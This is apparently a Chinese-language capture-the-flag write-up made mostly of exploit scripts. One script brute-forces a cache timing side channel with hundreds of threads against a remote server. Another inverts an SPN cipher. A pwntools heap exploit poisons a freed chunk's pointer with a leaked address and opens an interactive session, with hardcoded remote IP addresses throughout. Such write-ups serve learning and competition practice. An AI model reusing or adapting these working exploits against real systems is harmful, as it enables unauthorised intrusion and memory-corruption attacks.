def gen_target(cache_pos, tag):
    return (tag << 10) + (cache_pos << 5)

def ss_box_item(addr):
    return ss_box[(addr-ss_box_addr)//4]

def p_box_item(addr):
    return p_box[(addr-p_box_addr)//4]

def ss_item_addr(value):
    return ss_box_addr+ss_box.index(value)*4

def p_item_addr(value):
    return p_box_addr+p_box.index(value)*4

def init():
    global ss_map
    global p_map
    for ss_item_addr in range(ss_box_addr, ss_box_addr+len(ss_box)*4, 4):
        ss_map[map_i(ss_item_addr)].append(ss_box_item(ss_item_addr))
    print(f"ss_map size: {hex(len(ss_map))}")
    for p_item_addr in range(p_box_addr, p_box_addr+len(p_box)*4, 4):
        p_map[map_i(p_item_addr)].append(p_box_item(p_item_addr))
    print(f"p_map size: {hex(len(p_map))}")

s1_list = []
p1_list = []
s1_matched = []

def burp_round_1():
    MAX_THREAD = 0x100
    global stop_flag
    stop_flag = False

    def check_si_fetch(p:MyPipe, cache_info):
        global stop_flag
        if stop_flag:
            p.close()
            return False
        p.maccess(ss_item_addr(ss_map[cache_info][0]), 1) # speed up
        p.conti()
        t1 = time()
        p.recv(1)
        t2 = time()
        #print(t2-t1)
        p.close()
        if t2-t1 >= 0.95:
            return False
        else:
            stop_flag = True
            return True

    pool = []
    init_active = threading.active_count()
    for cache_info in ss_map.keys():
        if stop_flag:
            break
        th = MyThread(func=check_si_fetch, args=(MyPipe(("124.71.173.176", 9999), "remote"), cache_info))
        th.setDaemon(True)
        while True:
            if threading.active_count()-init_active > MAX_THREAD:
                sleep(0.8)
            else:
                th.start()
                pool.append(th)
                #print(th.get_args(1))
                break
    for th in pool:
        th.join()
        if th.get_result() == True:
            s1_cache_info = th.get_args(1)
            s1_list = ss_map[s1_cache_info]
            break
    print(f"s1_cache_info: {s1_cache_info}")
    print(f"s1_list: {s1_list}")

    for s1 in s1_list:
        p = MyPipe(("124.71.173.176", 9999), "remote")
        p.skip()
        p.maccess(p_item_addr(p_box[s1]), 1) # speed up
        p.conti()
        t1 = time()
        p.recv(1)
        t2 = time()
        if(t2-t1 >= 0.96):
            print("Miss")
            p.close()
        else:
            p1_cache_info = map_i(p_item_addr(p_box[s1]))
            print(f"Got p1 cache info: {p1_cache_info}")
            p1_list.append(p_box[s1])
            s1_matched.append(s1)
            p.close()
    print(f"p1_list: {p1_list}")
    print(f"s1_matched: {s1_matched}")

def exp():
    init()
    burp_round_1()

if __name__ == "__main__":
    exp()

第四组不用爆完,本地调试的时候线程开多点爆完验证一下就好

[remote]

round 1:
p1_list: [24177, 24160, 24176, 20336]
s1_matched: [20075, 20072, 20074, 20070]

round 2:
p2_list: [29651, 29634]
s2_matched: [10975, 10972]

round 3:
p3_list: [51619, 55459, 51635]
s3_matched: [59445, 59449, 59447]

然后根据上面的信息拿mlist和klist:

p1_list = [24177, 24160, 24176, 20336]
s1_matched = [20075, 20072, 20074, 20070]
p2_list = [29651, 29634]
s2_matched = [10975, 10972]
p3_list = [51619, 55459, 51635]
s3_matched = [59445, 59449, 59447]
mlist = [hex(ss_box.index(i))[2:].rjust(4 , '0') for i in s1_matched]
k2list = []
k1list = []
for s in s2_matched:
    for p in p1_list:
        temp = ss_box.index(s)
        a = p ^ temp
        k1list.append(a)
for s in s3_matched:
    for p in p2_list:
        temp = ss_box.index(s)
        a = p ^ temp
        k2list.append(a)
klist = []
for k1 in k1list:
    for k2 in k2list:
        temp1 = k1 &0xfff
        temp2 = k2 >> 4
        if temp1 == temp2:
            klist.append((k1 <<4)+(k2&0xf))

print(mlist)

spn

sbox = [0xE, 4, 0xD, 1, 2, 0xF, 0xB, 8, 3, 0xA, 6, 0xC, 5, 9 , 0 , 7]
pbox = [1, 5, 9, 0xD, 2, 6, 0xA, 0xE, 3, 7, 0xB, 0xF, 4, 8,0xC, 0x10]
masks = [0x8000, 0x4000, 0x2000, 0x1000, 0x800, 0x400, 0x200, 0x100,0x80, 0x40, 0x20, 0x10, 8, 4, 2, 1]
key = [0x3a94,0xa94d ,0x94d6,0x4d63,0xd63f]
def re_s(c):
    res = 0
    for i in range(4):
        temp = c % 16
        res += sbox.index(temp)*2**(4*i)
        c //= 16
    return res
def re_p(c):
    res = 0
    for i in range(16):
        if c &(0x8000>>i) != 0:
            res |=(0x8000 >> (pbox[i] - 1))
    return res

def dec(m):
    m = (m[1]<<8) | m[0]
    m ^= key[-1]
    for i in range(3):
        m = re_s(m)
        m ^= key[-(i+2)]
        m = re_p(m)
    m = re_s(m)
    m ^= key[0]
    m = bytes([m&0xff , m >> 8])
    return m
def decrypt(m):
    c = b''
    assert len(m) % 2 == 0
    for i in range(len(m) // 2):
        c += dec(m[i*2:i*2+2])
    return c

print(decrypt(b'4N4N4N4N'))

过spn的脚本,调用decrypt(想要在内存写的东西),然后把返回值扔过去就行了。
密文长度必须是2的倍数,如果不是2的倍数远程会默认后面是\x00或者是其他的奇奇怪怪的东西,为了避免错误建议用2的倍数

鉴于decrypt出来的值不太稳定改成两次edit,第一次收集下变化的部分放进nonaddlist第二次正常打

from pwn import *

#p = process("./SPN_ENC", env = {"LD_PRELOAD": "./libc-2.27.so"})
#p = process("./SPN_ENC")
p = remote("124.71.194.126", 9999)
context.log_level = "debug"

sbox = [0xE, 4, 0xD, 1, 2, 0xF, 0xB, 8, 3, 0xA, 6, 0xC, 5, 9 , 0 , 7]
pbox = [1, 5, 9, 0xD, 2, 6, 0xA, 0xE, 3, 7, 0xB, 0xF, 4, 8,0xC, 0x10]
masks = [0x8000, 0x4000, 0x2000, 0x1000, 0x800, 0x400, 0x200, 0x100,0x80, 0x40, 0x20, 0x10, 8, 4, 2, 1]
key = [0x3a94,0xa94d ,0x94d6,0x4d63,0xd63f]
nonaddlist = []

def re_s(c):
    res = 0
    for i in range(4):
        temp = c % 16
        res += sbox.index(temp)*2**(4*i)
        c //= 16
    return res
def re_p(c):
    res = 0
    for i in range(16):
        if c &(0x8000>>i) != 0:
            res |=(0x8000 >> (pbox[i] - 1))
    return res

def dec(m):
    addnum = 0
    if m in nonaddlist:
        addnum = 1
    m = (m[1]<<8) | m[0]
    m ^= key[-1]
    for i in range(3):
        m = re_s(m)
        m ^= key[-(i+2)]
        m = re_p(m)
    m = re_s(m)
    m ^= key[0]
    
    m = bytes([m&0xff , (m >> 8)+addnum])
    return m
def decrypt(m):
    c = b''
    assert len(m) % 2 == 0
    for i in range(len(m) // 2):
        c += dec(m[i*2:i*2+2])
    return c

def malloc(size, idx):
    p.sendlineafter(b"0.exit\n", b"1")
    p.sendlineafter(b"Size:\n", str(size).encode())
    p.sendlineafter(b"Index:\n", str(idx).encode())
    
def edit(index, size, content):
    p.sendlineafter(b"0.exit\n", b"2")
    p.sendlineafter(b"Index:\n", str(index).encode())
    p.sendlineafter(b"Size\n", str(size).encode())
    p.sendafter(b"Content\n", content)
    
def free(idx):
    p.sendlineafter(b"0.exit\n", b"3")
    p.sendlineafter(b"Index:\n", str(idx).encode())
    
def show(idx):
    p.sendlineafter(b"0.exit\n", b"4")
    p.sendlineafter(b"Index:\n", str(idx).encode())

#: 0x555555554000

def exp():
    p.recvuntil(b"gift:")
    gift = int(p.recvuntil(b"\n", drop=True).decode(), 16)
    elf_base = gift - 0x2040E0
    print("gift:", hex(gift))
    print("elf_base:", hex(elf_base))
    
    # malloc
    malloc(0x40, 0)
    for i in range(3):
        malloc(0x20, i+1)
    free(3)
    free(2)
    free(1)
    payload = b"A"*0x40+p64(0)+p64(0x31)+p64(gift)
    payload_dec = decrypt(payload)
    print("Payload len:", hex(len(payload)))
    print(payload.hex())
    print(payload_dec.hex())
    w_size = 0x58
    edit(0, w_size, payload_dec)
    for i in range(0, w_size*2, 4):
        p.recvuntil(b"w:")
        tar = payload_dec.hex()[i+2:i+4]+payload_dec.hex()[i:i+2]
        act = p.recvuntil(b"\n", drop=True).decode().rjust(4, "0")
        print(tar, act)
        if tar != act:
            nonaddlist.append(bytes([payload[i//2]])+bytes([payload[i//2+1]]))
    print(nonaddlist)
    edit(0, w_size, decrypt(payload))
    
    # fetch
    malloc(0x20, 5)
    malloc(0x20, 6)
    edit(6, 8, b"A"*8)
    print("gift:", hex(gift))
    p.sendline(b"5")
    
    p.interactive()

if __name__ == "__main__":
    exp()